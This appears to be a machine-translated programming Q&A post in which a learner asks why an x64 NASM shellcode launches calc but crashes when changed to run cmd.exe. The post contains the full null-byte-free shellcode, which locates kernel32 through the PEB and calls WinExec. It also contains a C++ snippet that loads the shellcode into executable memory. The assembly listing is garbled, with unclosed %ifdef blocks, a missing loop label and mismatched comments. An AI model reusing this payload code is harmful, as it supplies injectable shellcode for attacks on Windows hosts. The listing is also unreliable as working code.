
时间:2018-06-04 08:03:58

标签: windows assembly 64-bit nasm

我一周前开始在 Windows10 上使用 NASM “学习”程序集,如果这个问题完全是“ wtf ,请原谅我“为了你。


Here我发现这段代码就像魅力一样,只有当 lpCmdLine 等于4个字节时,我认为问题是与堆栈对齐有关的问题,但我不明白如何解决问题。 我已经搜索了3天的解决方案,阅读了我能找到的关于装配的所有内容,但我的大脑完全卡住了。

在这个示例代码中,我尝试启动cmd.exe(7个字节,8个带有最后的0x20 char ['']以避免空字节),但是没有用。

您可以在 62

    [BITS 64]

%define B2W(b1,b2)                      (((b2) << 8) + (b1))
%define W2DW(w1,w2)                     (((w2) << 16) + (w1))
%define DW2QW(dw1,dw2)                  (((dw2) << 32) + (dw1))
%define B2DW(b1,b2,b3,b4)               ((B2W(b3, b4) << 16) + B2W(b1, b2))
%define B2QW(b1,b2,b3,b4,b5,b6,b7,b8)   ((B2DW(b5,b6,b7,b8) << 32) + B2DW(b1,b2,b3,b4))
%define W2QW(w1,w2,w3,w4)               ((W2DW(w3,w4) << 32) + W2DW(w1,w2))

; x64 WinExec *requires* 16 byte stack alignment and four QWORDS of stack space, which may be overwritten.
; http://msdn.microsoft.com/en-us/library/ms235286.aspx
global shellcode
%ifdef FUNC                               ; assumes stack ends with 8 on entry, use STACK_ALIGN if it might not be.
%ifdef CLEAN                              ; 64-bit calling convention considers RAX, RCX, RDX, R8, R9, R10 and R11
    PUSH    RAX                           ; volatile. Use CLEAN if you want to preserve those as well.
    PUSH    RCX
    PUSH    RDX
    PUSH    RBX
    PUSH    RSI
    PUSH    RDI
    PUSH    RBP                           ; Stack now ends with 8 (!CLEAN) or is 16 byte (CLEAN) aligned
%ifdef FUNC
    PUSH    RSP
    POP     RAX
    AND     SP, -16                       ; Align stack to 16 bytes
                                          ; (we can't force it to end with 8 without dummy push and then or)
    PUSH    RAX                           ; Force stack to end with 8 before next push, also saves RSP to restore stack
%elifdef CLEAN
    PUSH    RAX                           ; dummy push to make stack end with 8 before next push

; Note to SkyLined: instructions on 32-bit registers are automatically sign-extended to 64-bits.
; This means LODSD will set the high DWORD of RAX to 0 if top bit of EAX was 0, or 0xFFFFFFFF if it was 0x80000000.
    PUSH    BYTE 0x60                     ; Stack 
    POP     RDX                           ; RDX = 0x60
%ifdef FUNC
%ifdef CLEAN
    PUSH    RAX                           ; exchanged RDX
    PUSH    RCX
    PUSH    RBX
    PUSH    RSI
    PUSH    RDI
    PUSH    RBP                           ; Stack now ends with 8 (!CLEAN) or is 16 byte (CLEAN) aligned
%ifdef CLEAN
    PUSH    RAX                           ; dummy push to make stack end with 8 before next push
    MOV     DL, 0x60
%ifndef USE_COMMON
    ; > Here I don't understand why doesen't works <
    PUSH    0x20657865 ; (space)exe
    PUSH    0x2E646D63 ; .dmc
                       ; I have already tried to use the macro B2DW, the same, crash at startup.
    PUSH    RSP
    POP     RCX                           ; RCX = &("calc")
    SUB     RSP, RDX                      ; Stack was 16 byte aligned already and there are >4 QWORDS on the stack.
    MOV     RSI, [GS:RDX]                 ; RSI = [TEB + 0x60] = &PEB
    MOV     RSI, [RSI + 0x18]             ; RSI = [PEB + 0x18] = PEB_LDR_DATA
    MOV     RSI, [RSI + 0x10]             ; RSI = [PEB_LDR_DATA + 0x10] = LDR_MODULE InLoadOrder[0] (process)
    LODSQ                                 ; RAX = InLoadOrder[1] (ntdll)
    MOV     RSI, [RAX]                    ; RSI = InLoadOrder[2] (kernel32)
    MOV     RDI, [RSI + 0x30]             ; RDI = [InLoadOrder[2] + 0x30] = kernel32 DllBase
; Found kernel32 base address (RDI)
    ADD     EDX, DWORD [RDI + 0x3C]       ; RBX = 0x60 + [kernel32 + 0x3C] = offset(PE header) + 0x60
; PE header (RDI+RDX-0x60) = @0x00 0x04 byte signature
;                            @0x04 0x18 byte COFF header
;                            @0x18      PE32 optional header (= RDI + RDX - 0x60 + 0x18)
    MOV     EBX, DWORD [RDI + RDX - 0x60 + 0x18 + 0x70] ; RBX = [PE32+ optional header + offset(PE32+ export table offset)] = offset(export table)
; Export table (RDI+EBX) = @0x20 Name Pointer RVA
    MOV     ESI, DWORD [RDI + RBX + 0x20] ; RSI = [kernel32 + offset(export table) + 0x20] = offset(names table)
    ADD     RSI, RDI                      ; RSI = kernel32 + offset(names table) = &(names table)
; Found export names table (RSI)
    MOV     EDX, DWORD [RDI + RBX + 0x24] ; EDX = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
; Found export ordinals table (RDX)
; speculatively load ordinal (RBP)
    MOVZX   EBP, WORD [RDI + RDX]         ; RBP = [kernel32 + offset(ordinals table) + offset] = function ordinal
    LEA     EDX, [RDX + 2]                ; RDX = offset += 2 (will wrap if > 4Gb, but this should never happen)
    LODSD                                 ; RAX = &(names table[function number]) = offset(function name)
    CMP     DWORD [RDI + RAX], B2DW('W', 'i', 'n', 'E') ; *(DWORD*)(function name) == "WinE" ?
    JNE     find_winexec_x64              ;
    MOV     ESI, DWORD [RDI + RBX + 0x1C] ; RSI = [kernel32 + offset(export table) + 0x1C] = offset(address table)
    ADD     RSI, RDI                      ; RSI = kernel32 + offset(address table) = &(address table)
    MOV     ESI, [RSI + RBP * 4]          ; RSI = &(address table)[WinExec ordinal] = offset(WinExec)
    ADD     RDI, RSI                      ; RDI = kernel32 + offset(WinExec) = WinExec
; Found WinExec (RDI)
    CDQ                                   ; RDX = 0 (assuming EAX < 0x80000000, which should always be true)
    CALL    RDI                           ; WinExec(&("calc"), 0);
%ifdef FUNC
%ifdef CLEAN
    ADD     RSP, 0x68                     ; reset stack to where it was after pushing registers
    ADD     RSP, 0x70                     ; reset stack to where it was after pushing registers
    ADD     RSP, 0x68                     ; reset stack to where it was after pushing registers
    POP     RSP
    POP     RBP                           ; POP registers
    POP     RDI
    POP     RSI
    POP     RBX
%ifdef CLEAN
    POP     RDX                           ; POP additional registers
    POP     RCX
    POP     RAX
    RET                                   ; Return
%ifdef CLEAN
    POP     RCX                           ; POP additional registers
    POP     RDX
    POP     RSP
%ifdef CLEAN
    POP     RAX
    RET                                   ; Return

为了测试一切是否正常,我得到 null 字节shellcode并从C ++启动

void *exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof(shellcode));

如果我使用推送0x636C6163 (计算),一切正常。

再次,如果这是一个总noob 问题,我很抱歉,但我无法弄清楚如何解决它。


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